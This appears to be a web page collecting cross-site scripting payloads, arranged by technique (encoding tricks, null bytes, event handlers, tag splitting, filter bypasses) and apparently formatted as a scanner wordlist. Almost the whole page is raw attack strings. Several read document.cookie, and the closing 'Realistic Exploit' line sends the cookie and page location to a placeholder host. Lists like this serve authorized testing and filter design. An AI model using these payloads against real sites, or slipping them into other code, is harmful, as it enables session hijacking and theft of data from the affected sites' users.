Cross Site Scripting | Payload Collection

Payload Collection

xss vulnerability cross site scripting payloads

Payloads for exploiting the XSS (Cross Site Scripting) vulnerability

Basic
##<script>alert(1234)</script>##1
##<script>prompt(1234)</script>##1
##<ScripT>alert(1234)</ScRipT>##1
##/<script>alert(1234)</script>##0
##<script>var m=<html><a href="//host">link</a>##1

Payload without the <script> tag
##<img+src="http://localhost">##1
##<DIV+STYLE="background-image: url(javascript:alert(1))">##1
##<IMG+DYNSRC="javascript:alert(1);">##1
##<IMG+LOWSRC="javascript:alert(1);">##1
##<isindex+type=image+src=1+onerror=alert(1)>##1
##<meta style="xss:expression(open(alert(1)))" />##1
##<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(1);\">##1
##<!</textarea <body onload='alert(1)'>##1
##<img+<iframe ="1" onerror="alert(1)">##1
##<iframe src="http://localhost"></iframe>##1
##<base+href="javascript:alert(1);//">##1
##<bgsound+src="javascript:alert(1);">##1
##<INPUT+TYPE="IMAGE"+SRC="javascript:alert(1);">##1
##<object+data="javascript:alert(0)">##1
##<STYLE>li+{list-style-image:url("javascript:alert(1)");}</STYLE><UL><LI>1##1
##<Layer+src="http://localhost">##1
##%3E%3Cbody%20onload=javascript:alert(1)%3E##1
##'">><marquee><h1>1</h1></marquee>##1
##</br style=a:expression(alert(1))>##1
##<font style='color:expression(alert(1))'>##1
##<embed src="data:image/svg+xml;>##1
##<frameset><frame src="xss"></frameset>##1
##<link href="http://host/xss.css">##1
##="/>%3ciframe%20src%3djavascript%3aalert%283%29%3e##1
##<object><param name="src" value="javascript:alert(0)"></param></object>##1
##<isindex action=javascript:alert(1) type=image>##1
##<b/alt="1"onmouseover=InputBox+1 language=vbs>test</b>##1
##</a onmousemove="alert(1)">##1
##'%26%26'javascript:alert%25281%2529//##1

Without Brackets
##"+onmouseover="window.location='http://localhost'##1
##"+onkeypress="prompt(23)"+##1
##"+onfocus="prompt(1)"+##1
##500);alert(1);//##1
##alert(document['cookie'])##1
##with(document)alert(cookie)##1
##";location=location.hash)//#0={};alert(0)##1
##//";alert(String.fromCharCode(88,83,83))##1
##%F6%3Cimg+onmouseover=prompt(/test/)//%F6%3E##1
##"+onDblClick=prompt(123)"+##1
##"+onError=prompt(123)"+##1
##"+onReset=prompt(123)"+##1

XSS payloads in JavaScript
##javascript:prompt(1)##1
##javascript:eval(unescape(location.href))##1
##a="get";b="URL";c="javascript:";d="alert(1);";eval(a+b+c+d);##1
##location=location.hash.slice(1);##1
##";location=location.hash)//#0={};alert(0)##1
##location=location.hash##1
##""+{toString:alert}##1
##""+{valueOf:alert}##1
##";eval(unescape(location))//# %0Aalert(0)##1
##;location.href='http://site';//##1

XSS - With NewLine
##%";eval(unescape(location))//#%0Aprompt(0)##1
##<SCRIPT>a=/XSS/%0Aalert(a.source)</SCRIPT>##1
##%'});%0aalert(1);%20//##1

XSS - With NewLine and Comment
##<script>//>%0Aalert(1);</script>##1

XSS - Null Byte Injected
##<script%00>alert(1)</script%00>##1
##<scr%00ipt>prompt(1)</sc%00ript>##1
##<scr\0ipt>prompt(1)</sc\0ript>##1
##%00"><script>alert(1)</script>##1

XSS - Null Byte in Script Tags
##%3Cscript%3Ealert(1)%3C/script%00TESTTEST%3E##1
 
XSS - With Encoded NewLine
##<IMG+SRC="jav&#x0A;ascript:alert(1);">##1

XSS - With Carriage Return
##<IMG+SRC="jav%0dascript:alert(1);">##1

With Encoded Carriage Return
##<IMG+SRC="jav&#x0D;ascript:alert(1);">##1

With Tab
##<IMG+SRC="jav%09ascript:alert(1);">##1 

With Encoded Tab
##<IMG+SRC="jav&#x09;ascript:alert(1);">##1 

Concatenation
##document.write("<scr"+"ipt language=javascript src=http://localhost/></scr"+"ipt>");##1

Developer Blacklist
##<scr<script>ipt>prompt(document.cookie)</scr</script>ipt>##1

XSS - basic XSS as parameter name
##12&<script>alert(123)</script>=123##1 

XSS - with eval
##<img src=x:alert(alt) onerror=eval(src) alt=0>##1 

XSS - Jquery
##<img src=/ onerror=alert(1)>##1 

XSS - with eval
##a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);##1

XSS - No white space for IE
##<img/src="xss.png"alt="xss">##1

XSS - Mocha
##<IMG SRC="mocha:[code]">##1 

XSS - XHTML
##<x:scriptxmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>##1

XSS - Remote style sheet
##<STYLE>@import'http://host/css';</STYLE>##1 

XSS - Special XSS
##<SCRIPT+a=">'>"SRC="http://localhost"></SCRIPT>##1 

XSS - Bypass for Custom Filters
##<scr<script>ipt>alert('XSS')</scr</script>ipt>##1

XSS - URL Encoded
##%3Cscript%3Ealert(1)%3C/script%3E##1 

XSS - Null Byte Injected
##foo%00<script>alert(document.cookie)</script>##1

XSS - Developer filter bypass
##"><<script>alert(document.cookie);//<</script>##1

XSS - Concatenation
##><s"%2b"cript>alert(document.cookie)</s"%2B"cript>##1

XSS - Extra URL Encoded
##3Cscript%3Ealert(1)%3C%2Fscript%3E##1 

XSS - Double URL Encoded
##%253Cscript%253Ealert(1)%253C/script%253E##1 

XSS - Full URL Encoded
##%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e##1

XSS - Ascii Encoded
##%BCscript%BEalert(%A21%A2)%BC/script%BE##1

XSS - Overlong UTF
##%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE##1

XSS - Base64 Encoded
##<object+data="data:text/html base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>##1

XSS - Base64 Encoded
##<a HREF="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==">ugh</a>##1

XSS - Full Base64 Encoded
##PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==##1

XSS - HTML Encoded
##<a+href="javas&#99;ript&#35;alert(1);">##1 

XSS - UTF-8 Encoded
##<IMG+SRC=j&#X41vascript:alert(1)>##1 

XSS - UTF-8 Encoded
##<IMG+SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#39;&#41;>##1

XSS - With uncommon event handler
##<INPUT+TYPE="checkbox"+onDblClick=confirm(XSS)>##1 

XSS - With uncommon event handler
##<APPLET+CODE=""+CODEBASE="http://url/xss">##1
XSS - Long UTF-8 Encoded
##<IMG+SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000039&#0000041>##1

XSS - %U Encoded
##%u0022%u003e%u003cscript%u003ealert%u0028%u0027Hello%u0027%u0029%u003c%u002fscript%u003e##1

XSS - UTF-7 Encoded
##+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-##1

XSS - Without quotes
##<SCRIPT>alert(String.fromCharCode(88))</SCRIPT>##1

XSS - HTML Entity Encoding
##&lt;script&gt;prompt(&apos;1&apos;)&lt;/script&gt;##1

XSS - Hex Entity Encoding
##&#x3c;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x78;&#x73;&#x73;&#x27;&#x29;&#x3c;&#x2f;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;##1

XSS - Decimal Entity Encoding
##&#x60;&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;&#x97;&#x108;&#x101;&#x114;&#x116;&#x40;&#x39;&#x120;&#x115;&#x115;&#x39;&#x41;&#x60;&#x47;&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;##1

XSS - Octal Entity Encoding
##&#x74;&#x163;&#x143;&#x162;&#x151;&#x160;&#x164;&#x76;&#x141;&#x154;&#x145;&#x162;&#x164;&#x50;&#x47;&#x170;&#x163;&#x163;&#x47;&#x51;&#x74;&#x57;&#x163;&#x143;&#x162;&#x151;&#x160;&#x164;&#x76;##1

XSS - Url Encoded HTML Entity
##=<img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert%26%23x28;1%26%23x29;>##1

XSS - With Expression for IE
##"+style%3d"x%3aexpression(alert(1))+##1

XSS - Escaping escapes
##\";alert(1);//##1 

XSS - Eating Chars
##<img src="x:%90" title="onerror=alert(1)//">##1 

XSS - FormFeed Injected for IE
##%3Cscript%0Caaaaa%3Ealert%2812%29%3C/script%0Caaaaa%3E##1 

XSS - FormFeed Injected for Firefox
##<script%0Caaaaa>alert(123)</script>##1

XSS - Vertical-tab Injected for IE
##%3Cscript%0Baaa%3Ealert%28%29%3C/script%0Baaaa%3E##1

XSS - Vertical-tab Injected for Firefox
##%3Cscript%0Baaa%3Ealert%281%29%3C/script%3E##1 

XSS - With star
##<*script>prompt(123)<*/script>##1 

XSS - Carriage Return Injected
##<script%0Daaa>alert(1)</script%0Daaaa>##1 

XSS - Space Insertion
##<script%20TEST>alert(1)</script%20TESTTEST>##1

XSS - Non Alpha/Non Digit
##<SCRIPT/XSSSRC="http://host"></SCRIPT>##1 

XSS - No Closing Script Tag
##<SCRIPT+SRC=http://host/##1 

XSS - With Extra Brackets
##<<SCRIPT>alert(1);//<</SCRIPT>##1 

XSS - Half-Width/Full-Width Characters
##<script>prompt(1)</script>##1

Half-Width/Full-Width Unicode -1
##\uff1c\uff53\uff43\uff52\uff49\uff50\uff54\uff1e\uff41\uff4c\uff45\uff52\uff54\uff08\uff07\uff58\uff53\uff53\uff07\uff09\uff1c\uff0f\uff53\uff43\uff52\uff49\uff50\uff54\uff1e##1

Half-Width/Full-Width Unicode -2
##%uff1c%uff53%uff43%uff52%uff49%uff50%uff54%uff1e%uff41%uff4c%uff45%uff52%uff54%uff08%uff07%uff58%uff53%uff53%uff07%uff09%uff1c%uff0f%uff53%uff43%uff52%uff49%uff50%uff54%uff1e##1

Full-Width %u Encoding
##%uff1cscript%uff1ealert(1234)%uff1c/script%uff1e##1 

As a Parameter Name
##1&"><script>alert(1)</script>=1##1 

Custom Filter
##</scr</script>ipt><ifr<iframeame/onload=prompt()>whs##1

Realistic Exploit
##%3E%3Cbody%20onload=javascript:alert(1)# var sc=escape(document.cookie);var d=escape(document.location);var mI=new Image();mI.src="http://host?a="+d+"&b="+ sc;##1
INTELMEX